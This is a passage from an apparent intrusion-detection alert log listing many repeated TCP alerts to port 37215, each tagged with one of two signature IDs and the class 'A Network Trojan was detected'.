              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756960
              SID:2835222
              Source Port:33514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507269
              SID:2835222
              Source Port:42506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440651
              SID:2829579
              Source Port:46734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554838
              SID:2835222
              Source Port:51978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176865
              SID:2829579
              Source Port:41034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969038
              SID:2829579
              Source Port:52716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.296015
              SID:2835222
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418268
              SID:2835222
              Source Port:37394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954228
              SID:2835222
              Source Port:41424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199650
              SID:2829579
              Source Port:52678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222794
              SID:2829579
              Source Port:44866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676637
              SID:2829579
              Source Port:55050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659946
              SID:2829579
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017157
              SID:2829579
              Source Port:36208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157200
              SID:2835222
              Source Port:48482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503639
              SID:2835222
              Source Port:54814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273345
              SID:2835222
              Source Port:43088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078044
              SID:2835222
              Source Port:32832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503962
              SID:2829579
              Source Port:43882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509979
              SID:2835222
              Source Port:42616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782554
              SID:2829579
              Source Port:35610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607654
              SID:2829579
              Source Port:52372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630254
              SID:2835222
              Source Port:40754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304537
              SID:2835222
              Source Port:45350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221844
              SID:2829579
              Source Port:58828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992549
              SID:2835222
              Source Port:53980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508913
              SID:2829579
              Source Port:35266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213056
              SID:2829579
              Source Port:46530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129938
              SID:2835222
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509552
              SID:2835222
              Source Port:35588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417303
              SID:2835222
              Source Port:60044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014150
              SID:2835222
              Source Port:55466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377861
              SID:2835222
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166995
              SID:2835222
              Source Port:40768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565908
              SID:2829579
              Source Port:41584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725837
              SID:2829579
              Source Port:57094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991111
              SID:2829579
              Source Port:52400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457030
              SID:2835222
              Source Port:43856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231623
              SID:2829579
              Source Port:42590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913936
              SID:2835222
              Source Port:45082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788674
              SID:2835222
              Source Port:40488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995500
              SID:2835222
              Source Port:33374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297189
              SID:2835222
              Source Port:58112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544806
              SID:2835222
              Source Port:45752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570394
              SID:2829579
              Source Port:38856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409281
              SID:2829579
              Source Port:37942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102374
              SID:2835222
              Source Port:43524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976833
              SID:2829579
              Source Port:53344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954106
              SID:2835222
              Source Port:51502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835829
              SID:2835222
              Source Port:35824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268333
              SID:2835222
              Source Port:60118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424446
              SID:2829579
              Source Port:50948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169501
              SID:2835222
              Source Port:42910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089389
              SID:2835222
              Source Port:46254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264042
              SID:2835222
              Source Port:36492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.378154
              SID:2835222
              Source Port:40058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212040
              SID:2835222
              Source Port:59902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173795
              SID:2835222
              Source Port:52230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543849
              SID:2835222
              Source Port:39758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211475
              SID:2829579
              Source Port:56092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451450
              SID:2829579
              Source Port:55858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416633
              SID:2829579
              Source Port:50106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153010
              SID:2829579
              Source Port:58072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.934836
              SID:2835222
              Source Port:36970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507315
              SID:2829579
              Source Port:54970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159380
              SID:2835222
              Source Port:57956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199561
              SID:2829579
              Source Port:50138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888421
              SID:2835222
              Source Port:53812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436801
              SID:2835222
              Source Port:44150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942865
              SID:2835222
              Source Port:52542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156383
              SID:2829579
              Source Port:40492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042737
              SID:2829579
              Source Port:36046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160293
              SID:2835222
              Source Port:60190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672910
              SID:2835222
              Source Port:53714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181656
              SID:2829579
              Source Port:60050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570326
              SID:2829579
              Source Port:48726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554254
              SID:2835222
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824012
              SID:2829579
              Source Port:51914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402575
              SID:2835222
              Source Port:55130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608950
              SID:2829579
              Source Port:45694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309362
              SID:2829579
              Source Port:35014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223392
              SID:2829579
              Source Port:53520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617424
              SID:2829579
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196774
              SID:2829579
              Source Port:48652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165202
              SID:2829579
              Source Port:39646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973446
              SID:2829579
              Source Port:42598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136158
              SID:2829579
              Source Port:57160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613100
              SID:2835222
              Source Port:53642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159784
              SID:2835222
              Source Port:33596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936541
              SID:2835222
              Source Port:34334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355389
              SID:2829579
              Source Port:53814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452466
              SID:2829579
              Source Port:57690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783524
              SID:2829579
              Source Port:46148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711923
              SID:2829579
              Source Port:34124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545282
              SID:2829579
              Source Port:44630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822050
              SID:2829579
              Source Port:44726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199301
              SID:2829579
              Source Port:41180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374931
              SID:2835222
              Source Port:53752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614485
              SID:2829579
              Source Port:43608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566186
              SID:2829579
              Source Port:39520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102145
              SID:2835222
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831082
              SID:2835222
              Source Port:34856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731393
              SID:2835222
              Source Port:36542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309310
              SID:2829579
              Source Port:33774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027262
              SID:2829579
              Source Port:51370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374982
              SID:2835222
              Source Port:34806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195366
              SID:2835222
              Source Port:52552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.131094
              SID:2835222
              Source Port:40064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273504
              SID:2829579
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155826
              SID:2829579
              Source Port:57780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266959
              SID:2835222
              Source Port:49902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941698
              SID:2835222
              Source Port:48206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914086
              SID:2835222
              Source Port:35520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707013
              SID:2835222
              Source Port:52388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196389
              SID:2835222
              Source Port:46608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109919
              SID:2829579
              Source Port:57328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255835
              SID:2829579
              Source Port:52552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132584
              SID:2829579
              Source Port:50182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679755
              SID:2835222
              Source Port:48362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027140
              SID:2835222
              Source Port:59150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095346
              SID:2835222
              Source Port:59942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695102
              SID:2829579
              Source Port:57780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554281
              SID:2829579
              Source Port:41236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131082
              SID:2835222
              Source Port:54468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725511
              SID:2835222
              Source Port:46430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159744
              SID:2829579
              Source Port:43100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630660
              SID:2829579
              Source Port:50878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784052
              SID:2835222
              Source Port:49398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.706883
              SID:2835222
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131802
              SID:2829579
              Source Port:39830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358696
              SID:2835222
              Source Port:34094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025384
              SID:2835222
              Source Port:43864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218091
              SID:2829579
              Source Port:54998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224765
              SID:2835222
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993736
              SID:2835222
              Source Port:47146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.779836
              SID:2835222
              Source Port:39740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805919
              SID:2835222
              Source Port:36432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553601
              SID:2835222
              Source Port:45276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937248
              SID:2829579
              Source Port:49570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870148
              SID:2829579
              Source Port:58740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501959
              SID:2829579
              Source Port:50600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554155
              SID:2835222
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306060
              SID:2835222
              Source Port:41270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153420
              SID:2829579
              Source Port:36870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275169
              SID:2835222
              Source Port:33146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245347
              SID:2835222
              Source Port:57956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279362
              SID:2829579
              Source Port:44048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418191
              SID:2829579
              Source Port:43548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231265
              SID:2829579
              Source Port:34288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241207
              SID:2835222
              Source Port:42158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503104
              SID:2829579
              Source Port:57110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458938
              SID:2835222
              Source Port:34936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088615
              SID:2829579
              Source Port:45016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629201
              SID:2835222
              Source Port:48264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307343
              SID:2835222
              Source Port:41238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992694
              SID:2829579
              Source Port:57732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671063
              SID:2829579
              Source Port:52736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157495
              SID:2835222
              Source Port:34890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231520
              SID:2835222
              Source Port:40924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305756
              SID:2829579
              Source Port:33446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109706
              SID:2835222
              Source Port:43136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252081
              SID:2829579
              Source Port:53748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137506
              SID:2829579
              Source Port:60050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790638
              SID:2829579
              Source Port:56946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197613
              SID:2835222
              Source Port:58278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455756
              SID:2829579
              Source Port:53228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759091
              SID:2829579
              Source Port:48844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567686
              SID:2835222
              Source Port:35752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973238
              SID:2829579
              Source Port:50908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376655
              SID:2835222
              Source Port:60186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153814
              SID:2829579
              Source Port:39138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256821
              SID:2829579
              Source Port:51838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935166
              SID:2829579
              Source Port:34876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991574
              SID:2835222
              Source Port:39026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614447
              SID:2829579
              Source Port:40296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320871
              SID:2829579
              Source Port:48542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753302
              SID:2829579
              Source Port:60078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.456690
              SID:2829579
              Source Port:33718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869044
              SID:2835222
              Source Port:45202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803067
              SID:2835222
              Source Port:43770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407444
              SID:2829579
              Source Port:52216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611495
              SID:2829579
              Source Port:39560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154751
              SID:2829579
              Source Port:33628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677524
              SID:2829579
              Source Port:44522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670336
              SID:2829579
              Source Port:39562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978659
              SID:2829579
              Source Port:58498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566046
              SID:2835222
              Source Port:56488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.706989
              SID:2829579
              Source Port:41466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028431
              SID:2835222
              Source Port:51150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524040
              SID:2835222
              Source Port:54842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823079
              SID:2829579
              Source Port:33684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942126
              SID:2829579
              Source Port:60912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306814
              SID:2829579
              Source Port:33886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437168
              SID:2829579
              Source Port:47234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099600
              SID:2829579
              Source Port:43478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420508
              SID:2829579
              Source Port:52016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346031
              SID:2835222
              Source Port:40254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
